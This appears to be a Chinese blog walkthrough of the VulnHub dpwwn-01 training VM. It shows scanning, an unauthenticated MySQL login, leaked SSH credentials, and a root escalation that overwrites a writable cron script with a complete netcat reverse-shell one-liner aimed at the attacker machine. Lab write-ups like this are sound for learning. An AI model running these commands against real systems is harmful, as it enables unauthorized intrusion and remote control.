vulnhub之dpwwn-01的实践

  • A+
所属分类:安全文章

本周末实践的是vulnhub的dpwwn-01镜像,这个镜像比较简单,

下载地址,https://download.vulnhub.com/dpwwn/dpwwn-01.zip,

解压后一看就是vmware的虚机,当然就用workstation打开,

启动靶机,从console上没有看到ip地址,还是得自己去扫,

启动kali攻击机,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

vulnhub之dpwwn-01的实践

拿到靶机地址,192.168.137.26,接着做端口扫描,

sudo nmap -sS -sV -T5 -A -p- 192.168.137.26,

vulnhub之dpwwn-01的实践

看到有mysql服务,尝试无密码连接一下,竟然进去了,

mysql -h 192.168.137.26 -u root -p,

然后经过一顿查询操作找到了一对儿用户名密码,

mistic/[email protected]$$swordmistic,

vulnhub之dpwwn-01的实践

用这对儿用户名密码尝试ssh登录一下,竟然也进去了,id一下发现不是root,接下来需要想办法提权,

vulnhub之dpwwn-01的实践

查看一下计划任务,cat /etc/crontab,发现/home/mistic/logrot.sh三分钟执行一次,而且这个脚本文件当前账户可写,

vulnhub之dpwwn-01的实践

在kali攻击机上制作反弹shell脚本内容,

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.137.204 LPORT=4444 R,

并在kali攻击机上开启nc监听,nc -lnvp 4444,

vulnhub之dpwwn-01的实践

在靶机上执行echo -e '#!/bin/bashnmkfifo /tmp/slxjbbf; nc 192.168.137.204 4444 0</tmp/slxjbbf | /bin/sh >/tmp/slxjbbf 2>&1; rm /tmp/slxjbbf' > /home/mistic/logrot.sh,把反弹shell脚本内容写入定时任务脚本文件,

等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。

vulnhub之dpwwn-01的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dpwwn-01的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: